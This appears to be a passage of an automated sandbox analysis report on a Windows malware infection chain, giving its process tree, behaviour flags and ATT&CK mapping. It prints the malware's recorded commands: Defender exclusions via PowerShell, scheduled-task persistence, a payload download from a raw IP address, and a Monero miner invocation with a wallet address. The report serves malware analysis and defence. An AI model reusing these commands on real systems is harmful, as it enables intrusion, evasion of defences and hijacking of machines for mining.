PID 1472 wrote to memory of 664	1472	explorku.exe	4b58e49bf4.exe
PID 4968 wrote to memory of 1204	4968	axplons.exe	alex.exe
PID 4968 wrote to memory of 1204	4968	axplons.exe	alex.exe
PID 4968 wrote to memory of 1204	4968	axplons.exe	alex.exe
PID 1204 wrote to memory of 3596	1204	alex.exe	RegAsm.exe
PID 1204 wrote to memory of 3596	1204	alex.exe	RegAsm.exe
PID 1204 wrote to memory of 3596	1204	alex.exe	RegAsm.exe
PID 1204 wrote to memory of 4692	1204	alex.exe	RegAsm.exe
PID 1204 wrote to memory of 4692	1204	alex.exe	RegAsm.exe
PID 1204 wrote to memory of 4692	1204	alex.exe	RegAsm.exe
PID 1204 wrote to memory of 4912	1204	alex.exe	RegAsm.exe
PID 1204 wrote to memory of 4912	1204	alex.exe	RegAsm.exe
PID 1204 wrote to memory of 4912	1204	alex.exe	RegAsm.exe
PID 1204 wrote to memory of 4912	1204	alex.exe	RegAsm.exe
PID 1204 wrote to memory of 4912	1204	alex.exe	RegAsm.exe
PID 1204 wrote to memory of 4912	1204	alex.exe	RegAsm.exe
PID 1204 wrote to memory of 4912	1204	alex.exe	RegAsm.exe
PID 1204 wrote to memory of 4912	1204	alex.exe	RegAsm.exe
PID 4912 wrote to memory of 4324	4912	RegAsm.exe	trf.exe
PID 4912 wrote to memory of 4324	4912	RegAsm.exe	trf.exe
PID 4912 wrote to memory of 1892	4912	RegAsm.exe	keks.exe
PID 4912 wrote to memory of 1892	4912	RegAsm.exe	keks.exe
PID 4912 wrote to memory of 1892	4912	RegAsm.exe	keks.exe
PID 4968 wrote to memory of 1136	4968	axplons.exe	gold.exe
PID 4968 wrote to memory of 1136	4968	axplons.exe	gold.exe
PID 4968 wrote to memory of 1136	4968	axplons.exe	gold.exe
PID 1136 wrote to memory of 4552	1136	gold.exe	RegAsm.exe
PID 1136 wrote to memory of 4552	1136	gold.exe	RegAsm.exe
PID 1136 wrote to memory of 4552	1136	gold.exe	RegAsm.exe
PID 1136 wrote to memory of 4552	1136	gold.exe	RegAsm.exe
PID 1136 wrote to memory of 4552	1136	gold.exe	RegAsm.exe
PID 1136 wrote to memory of 4552	1136	gold.exe	RegAsm.exe
PID 1136 wrote to memory of 4552	1136	gold.exe	RegAsm.exe
PID 1136 wrote to memory of 4552	1136	gold.exe	RegAsm.exe
PID 1136 wrote to memory of 4552	1136	gold.exe	RegAsm.exe
PID 4968 wrote to memory of 2476	4968	axplons.exe	redline1.exe
PID 4968 wrote to memory of 2476	4968	axplons.exe	redline1.exe
PID 4968 wrote to memory of 2476	4968	axplons.exe	redline1.exe
PID 4968 wrote to memory of 764	4968	axplons.exe	install.exe
PID 4968 wrote to memory of 764	4968	axplons.exe	install.exe
PID 4968 wrote to memory of 764	4968	axplons.exe	install.exe
PID 764 wrote to memory of 1204	764	install.exe	GameService.exe
PID 764 wrote to memory of 1204	764	install.exe	GameService.exe
PID 764 wrote to memory of 1204	764	install.exe	GameService.exe
PID 1204 wrote to memory of 2320	1204	cmd.exe	sc.exe
PID 1204 wrote to memory of 2320	1204	cmd.exe	sc.exe
PID 1204 wrote to memory of 2320	1204	cmd.exe	sc.exe
PID 1204 wrote to memory of 3168	1204	cmd.exe	GameService.exe
PID 1204 wrote to memory of 3168	1204	cmd.exe	GameService.exe
PID 1204 wrote to memory of 3168	1204	cmd.exe	GameService.exe

Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
persistence

Query Registry
T1012

C:\Users\Admin\AppData\Local\Temp\63a57d86f18040563e6b0a9fa14c3470cbd614b6e6e58068e50b6e3594db0e3f.exe
"C:\Users\Admin\AppData\Local\Temp\63a57d86f18040563e6b0a9fa14c3470cbd614b6e6e58068e50b6e3594db0e3f.exe"
1⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Checks whether UAC is enabled
- Drops file in Windows directory
- Suspicious use of WriteProcessMemory
PID:3568

C:\Users\Admin\AppData\Local\Temp\908f070dff\explorku.exe
"C:\Users\Admin\AppData\Local\Temp\908f070dff\explorku.exe"
2⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Adds Run key to start application
- Checks whether UAC is enabled
- Suspicious use of WriteProcessMemory
PID:1472

C:\Users\Admin\AppData\Local\Temp\908f070dff\explorku.exe
"C:\Users\Admin\AppData\Local\Temp\908f070dff\explorku.exe"
3⤵
PID:2312

C:\Users\Admin\AppData\Local\Temp\1000005001\amers.exe
"C:\Users\Admin\AppData\Local\Temp\1000005001\amers.exe"
3⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Drops file in Windows directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
PID:784

C:\Users\Admin\AppData\Local\Temp\7af68cdb52\axplons.exe
"C:\Users\Admin\AppData\Local\Temp\7af68cdb52\axplons.exe"
4⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
PID:4968

C:\Users\Admin\AppData\Local\Temp\1000003001\alex.exe
"C:\Users\Admin\AppData\Local\Temp\1000003001\alex.exe"
5⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
- Suspicious use of WriteProcessMemory
PID:1204

C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
6⤵
PID:3596

C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
6⤵
PID:4692

C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
6⤵
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:4912

C:\Users\Admin\AppData\Roaming\configurationValue\trf.exe
"C:\Users\Admin\AppData\Roaming\configurationValue\trf.exe"
7⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:4324

C:\Users\Admin\AppData\Roaming\configurationValue\keks.exe
"C:\Users\Admin\AppData\Roaming\configurationValue\keks.exe"
7⤵
- Executes dropped EXE
- Modifies system certificate store
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1892

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /C choice /C Y /N /D Y /T 3 & Del "RegAsm.exe"
7⤵
PID:1436

C:\Windows\SysWOW64\choice.exe
choice /C Y /N /D Y /T 3
8⤵
PID:4752

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 1204 -s 364
6⤵
- Program crash
PID:2772

C:\Users\Admin\AppData\Local\Temp\1000004001\gold.exe
"C:\Users\Admin\AppData\Local\Temp\1000004001\gold.exe"
5⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
- Suspicious use of WriteProcessMemory
PID:1136

C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
6⤵
PID:4552

C:\Users\Admin\AppData\Local\Temp\1000005001\redline1.exe
"C:\Users\Admin\AppData\Local\Temp\1000005001\redline1.exe"
5⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2476

C:\Users\Admin\AppData\Local\Temp\1000006001\install.exe
"C:\Users\Admin\AppData\Local\Temp\1000006001\install.exe"
5⤵
- Executes dropped EXE
- Drops file in Program Files directory
- Suspicious use of WriteProcessMemory
PID:764

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Program Files (x86)\GameSyncLink\installg.bat" "
6⤵
- Suspicious use of WriteProcessMemory
PID:1204

C:\Windows\SysWOW64\sc.exe
Sc stop GameServerClient
7⤵
- Launches sc.exe
PID:2320

C:\Program Files (x86)\GameSyncLink\GameService.exe
GameService remove GameServerClient confirm
7⤵
- Executes dropped EXE
PID:3168

C:\Windows\SysWOW64\sc.exe
Sc delete GameSyncLink
7⤵
- Launches sc.exe
PID:4756

C:\Program Files (x86)\GameSyncLink\GameService.exe
GameService remove GameSyncLink confirm
7⤵
- Executes dropped EXE
PID:3688

C:\Program Files (x86)\GameSyncLink\GameService.exe
GameService install GameSyncLink "C:\Program Files (x86)\GameSyncLink\GameSyncLink.exe"
7⤵
- Executes dropped EXE
PID:2456

C:\Program Files (x86)\GameSyncLink\GameService.exe
GameService start GameSyncLink
7⤵
- Executes dropped EXE
PID:2356

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Program Files (x86)\GameSyncLink\installc.bat" "
6⤵
PID:3440

C:\Windows\SysWOW64\sc.exe
Sc stop GameServerClientC
7⤵
- Launches sc.exe
PID:3664

C:\Program Files (x86)\GameSyncLink\GameService.exe
GameService remove GameServerClientC confirm
7⤵
- Executes dropped EXE
PID:2140

C:\Windows\SysWOW64\sc.exe
Sc delete PiercingNetLink
7⤵
- Launches sc.exe
PID:2512

C:\Program Files (x86)\GameSyncLink\GameService.exe
GameService remove PiercingNetLink confirm
7⤵
- Executes dropped EXE
PID:4584

C:\Program Files (x86)\GameSyncLink\GameService.exe
GameService install PiercingNetLink "C:\Program Files (x86)\GameSyncLink\PiercingNetLink.exe"
7⤵
- Executes dropped EXE
PID:3168

C:\Program Files (x86)\GameSyncLink\GameService.exe
GameService start PiercingNetLink
7⤵
- Executes dropped EXE
PID:4752

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Program Files (x86)\GameSyncLink\installm.bat" "
6⤵
PID:1208

C:\Windows\SysWOW64\sc.exe
Sc delete GameSyncLinks
7⤵
- Launches sc.exe
PID:2108

C:\Program Files (x86)\GameSyncLink\GameService.exe
GameService remove GameSyncLinks confirm
7⤵
- Executes dropped EXE
PID:4564

C:\Program Files (x86)\GameSyncLink\GameService.exe
GameService install GameSyncLinks "C:\Program Files (x86)\GameSyncLink\GameSyncLinks.exe"
7⤵
- Executes dropped EXE
PID:8

C:\Program Files (x86)\GameSyncLink\GameService.exe
GameService start GameSyncLinks
7⤵
- Executes dropped EXE
PID:1924

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\7ZSfx000.cmd" "
6⤵
PID:3196

C:\Users\Admin\AppData\Local\Temp\1000007001\swizzhis.exe
"C:\Users\Admin\AppData\Local\Temp\1000007001\swizzhis.exe"
5⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
PID:3928

C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
6⤵
- Loads dropped DLL
- Checks processor information in registry
- Suspicious behavior: EnumeratesProcesses
PID:2704

C:\Users\Admin\AppData\Local\Temp\1000010001\lumma1.exe
"C:\Users\Admin\AppData\Local\Temp\1000010001\lumma1.exe"
5⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
PID:2064

C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
6⤵
PID:2076

C:\Users\Admin\AppData\Local\Temp\1000013001\file300un.exe
"C:\Users\Admin\AppData\Local\Temp\1000013001\file300un.exe"
5⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
PID:2348

C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe"
6⤵
PID:1084

C:\Windows\Microsoft.NET\Framework\v4.0.30319\installutil.exe
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\installutil.exe"
6⤵
PID:2356

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 2356 -s 172
7⤵
- Program crash
PID:5008

C:\Users\Admin\AppData\Local\Temp\1000015001\NewB.exe
"C:\Users\Admin\AppData\Local\Temp\1000015001\NewB.exe"
5⤵
- Executes dropped EXE
PID:4980

C:\Windows\SysWOW64\schtasks.exe
"C:\Windows\System32\schtasks.exe" /Create /SC MINUTE /MO 1 /TN NewB.exe /TR "C:\Users\Admin\AppData\Local\Temp\1000015001\NewB.exe" /F
6⤵
- Creates scheduled task(s)
PID:1060

C:\Users\Admin\AppData\Local\Temp\1000254001\ISetup8.exe
"C:\Users\Admin\AppData\Local\Temp\1000254001\ISetup8.exe"
6⤵
- Executes dropped EXE
PID:4712

C:\Users\Admin\AppData\Local\Temp\u3mw.0.exe
"C:\Users\Admin\AppData\Local\Temp\u3mw.0.exe"
7⤵
- Executes dropped EXE
- Loads dropped DLL
- Checks processor information in registry
- Suspicious behavior: EnumeratesProcesses
PID:2396

C:\Users\Admin\AppData\Local\Temp\u3mw.1.exe
"C:\Users\Admin\AppData\Local\Temp\u3mw.1.exe"
7⤵
- Executes dropped EXE
- Checks SCSI registry key(s)
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
PID:4144

C:\Users\Admin\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe
"C:\Users\Admin\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe" /eieci=11A12794-499E-4FA0-A281-A9A9AA8B2685 /eipi=5488CB36-BE62-4606-B07B-2EE938868BD1
8⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:3984

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 4712 -s 1440
7⤵
- Program crash
PID:1708

C:\Users\Admin\AppData\Local\Temp\1000255001\toolspub1.exe
"C:\Users\Admin\AppData\Local\Temp\1000255001\toolspub1.exe"
6⤵
- Executes dropped EXE
- Checks SCSI registry key(s)
PID:1932

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 1932 -s 384
7⤵
- Program crash
PID:4692

C:\Users\Admin\AppData\Local\Temp\1000256001\4767d2e713f2021e8fe856e3ea638b58.exe
"C:\Users\Admin\AppData\Local\Temp\1000256001\4767d2e713f2021e8fe856e3ea638b58.exe"
6⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:3196

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell -nologo -noprofile
7⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious use of AdjustPrivilegeToken
PID:872

C:\Users\Admin\AppData\Local\Temp\1000256001\4767d2e713f2021e8fe856e3ea638b58.exe
"C:\Users\Admin\AppData\Local\Temp\1000256001\4767d2e713f2021e8fe856e3ea638b58.exe"
7⤵
- Executes dropped EXE
PID:4656

C:\Users\Admin\AppData\Local\Temp\1000024001\taskmgr.exe
"C:\Users\Admin\AppData\Local\Temp\1000024001\taskmgr.exe"
5⤵
- Executes dropped EXE
- Adds Run key to start application
- Modifies registry class
- Suspicious behavior: AddClipboardFormatListener
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of SetWindowsHookEx
PID:2636

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\1000024001\taskmgr.exe'
6⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1852

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'taskmgr.exe'
6⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:3040

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\ProgramData\taskmgr.exe'
6⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:956

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'taskmgr.exe'
6⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2540

C:\Windows\System32\schtasks.exe
"C:\Windows\System32\schtasks.exe" /create /f /RL HIGHEST /sc minute /mo 1 /tn "taskmgr" /tr "C:\ProgramData\taskmgr.exe"
6⤵
- Creates scheduled task(s)
PID:1124

C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\ProgramData\ssa.vbs"
6⤵
PID:1196

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" $webClient = New-Object System.Net.WebClient; $webClient.Credentials = New-Object System.Net.NetworkCredential('dd', 'mn...123456'); $webClient.DownloadFile('http://193.222.96.193:81/besho/besho.mp4', 'C:\Users\Public\Documents\max3d.zip'); Expand-Archive -Path 'C:\Users\Public\Documents\max3d.zip' -DestinationPath 'C:\Users\Public\Documents\' -Force
7⤵
- Blocklisted process makes network request
- Suspicious use of AdjustPrivilegeToken
PID:2476

C:\Users\Admin\1000006002\4b58e49bf4.exe
"C:\Users\Admin\1000006002\4b58e49bf4.exe"
3⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Checks whether UAC is enabled
PID:664

C:\Users\Admin\AppData\Local\Temp\908f070dff\explorku.exe
C:\Users\Admin\AppData\Local\Temp\908f070dff\explorku.exe
1⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Checks whether UAC is enabled
PID:3136

C:\Users\Admin\AppData\Local\Temp\7af68cdb52\axplons.exe
C:\Users\Admin\AppData\Local\Temp\7af68cdb52\axplons.exe
1⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious behavior: EnumeratesProcesses
PID:3912

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 188 -p 1204 -ip 1204
1⤵
PID:536

C:\Program Files (x86)\GameSyncLink\GameService.exe
"C:\Program Files (x86)\GameSyncLink\GameService.exe"
1⤵
- Executes dropped EXE
PID:4436

C:\Program Files (x86)\GameSyncLink\GameSyncLink.exe
"C:\Program Files (x86)\GameSyncLink\GameSyncLink.exe"
2⤵
- Executes dropped EXE
PID:5088

C:\Windows\Temp\189993.exe
"C:\Windows\Temp\189993.exe" --list-devices
3⤵
- Executes dropped EXE
- Loads dropped DLL
PID:2824

C:\Program Files (x86)\GameSyncLink\GameService.exe
"C:\Program Files (x86)\GameSyncLink\GameService.exe"
1⤵
- Executes dropped EXE
PID:4716

C:\Program Files (x86)\GameSyncLink\PiercingNetLink.exe
"C:\Program Files (x86)\GameSyncLink\PiercingNetLink.exe"
2⤵
- Executes dropped EXE
PID:4684

C:\Program Files (x86)\GameSyncLink\GameService.exe
"C:\Program Files (x86)\GameSyncLink\GameService.exe"
1⤵
- Executes dropped EXE
PID:1204

C:\Program Files (x86)\GameSyncLink\GameSyncLinks.exe
"C:\Program Files (x86)\GameSyncLink\GameSyncLinks.exe"
2⤵
- Executes dropped EXE
- Drops file in Program Files directory
PID:4744

C:\Windows\Temp\731486.exe
"C:\Windows\Temp\731486.exe" --http-port 14343 -o xmr.2miners.com:2222 -u 83dQM82bj4yY83XKGKHnbHTzqgY4FUt2pi1JS15u7rTs8v84mTU5ny5MiRoSeyduBUAQKFZ6MsvbMHYTisNeThDM3BqQ59y --coin XMR -t 1 --no-color -p x
3⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of FindShellTrayWindow
PID:884

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 436 -p 2356 -ip 2356
1⤵
PID:2928

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 512 -p 1932 -ip 1932
1⤵
PID:4392

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 436 -p 4712 -ip 4712
1⤵
PID:3984

C:\Users\Admin\AppData\Local\Temp\1000015001\NewB.exe
C:\Users\Admin\AppData\Local\Temp\1000015001\NewB.exe
1⤵
- Executes dropped EXE
PID:4568

C:\ProgramData\taskmgr.exe
C:\ProgramData\taskmgr.exe
1⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:2280

C:\Users\Admin\AppData\Local\Temp\7af68cdb52\axplons.exe
C:\Users\Admin\AppData\Local\Temp\7af68cdb52\axplons.exe
1⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious behavior: EnumeratesProcesses
PID:1944

C:\Users\Admin\AppData\Local\Temp\908f070dff\explorku.exe
C:\Users\Admin\AppData\Local\Temp\908f070dff\explorku.exe
1⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Checks whether UAC is enabled
PID:4736

C:\Users\Admin\AppData\Local\Temp\1000015001\NewB.exe
C:\Users\Admin\AppData\Local\Temp\1000015001\NewB.exe
1⤵
- Executes dropped EXE
PID:1944

C:\ProgramData\taskmgr.exe
C:\ProgramData\taskmgr.exe
1⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:2824

C:\Users\Admin\AppData\Local\Temp\7af68cdb52\axplons.exe
C:\Users\Admin\AppData\Local\Temp\7af68cdb52\axplons.exe
1⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
PID:3596

C:\Users\Admin\AppData\Local\Temp\908f070dff\explorku.exe
C:\Users\Admin\AppData\Local\Temp\908f070dff\explorku.exe
1⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Checks whether UAC is enabled
PID:3928

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Command and Scripting Interpreter

T1059

PowerShell

T1059.001

Scheduled Task/Job

T1053

System Services

T1569

Service Execution

T1569.002

Persistence

Boot or Logon Autostart Execution

T1547

Registry Run Keys / Startup Folder

T1547.001

Create or Modify System Process

T1543

Windows Service

T1543.003

Scheduled Task/Job

T1053

Privilege Escalation

Boot or Logon Autostart Execution

T1547

Registry Run Keys / Startup Folder

T1547.001

Create or Modify System Process

T1543

Windows Service

T1543.003

Scheduled Task/Job

T1053

Defense Evasion

Impair Defenses

T1562

Modify Registry

T1112

Subvert Trust Controls

T1553

Install Root Certificate

T1553.004

Virtualization/Sandbox Evasion

Credential Access

Unsecured Credentials

T1552

Credentials In Files

T1552.001

Discovery

Peripheral Device Discovery

T1120

Query Registry

System Information Discovery

Virtualization/Sandbox Evasion